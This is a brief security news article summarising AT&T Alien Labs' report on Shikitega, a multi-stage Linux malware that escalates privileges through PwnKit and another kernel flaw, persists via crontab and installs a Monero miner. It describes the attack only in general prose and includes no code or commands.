A new stealth Linux malware called Shikitega was discovered by adopting a multi-step infection chain to compromise endpoints and IoT devices and drop additional payloads.
“An attacker can take full control of the system, in addition to the cryptocurrency miner being run and configured to persist,” AT&T Alien Labs said in a new report released Tuesday.
The findings add to a growing list of Linux malware that has been found in the wild in recent months, including BPFDoor, Symbiote, Syslogk, OrBit and Lightning Framework.
Once deployed on a targeted host, the attack chain downloads and runs Metasploit’s “Mettle” counter to maximize control, exploits vulnerabilities to elevate its privileges, adds persistence on the host via crontab, and finally launches a cryptocurrency miner on infected devices.
The exact method by which the initial compromise is achieved remains unknown at this time, but what makes Shikitega elusive is its ability to download next-stage payloads from a command-and-control server (C2 ) and run them directly in memory.
Elevation of privilege is achieved by exploiting CVE-2021-4034 (aka PwnKit) and CVE-2021-3493, allowing the adversary to abuse elevated permissions to retrieve and run end stage shell scripts with the root privileges to establish persistence and deploy the Monero crypto miner.
In another attempt to fly under the radar, malware operators are using a “Shikata ga nai” polymorphic encoder to make it harder to detect by antivirus engines and abuse legitimate cloud services for C2 functions.
Shikitega also points to a trend of malicious actors extending their attack scope to accommodate the Linux operating system which is widely used in cloud platforms and servers across the world, contributing to an increase in malware infections. LockBit and Cheerscrypt ransomware.
According to Trend Micro 2022 Midyear Cybersecurity Report, “the emergence of these new Linux ransomware families corresponds directly to […] a 75% increase in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021.”
“Threat actors continue to research ways to deliver malware in new ways to stay under the radar and avoid detection,” said AT&T Alien Labs researcher Ofer Caspi.
“The Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder and it gradually delivers its payload where each step only reveals a part of the total payload.”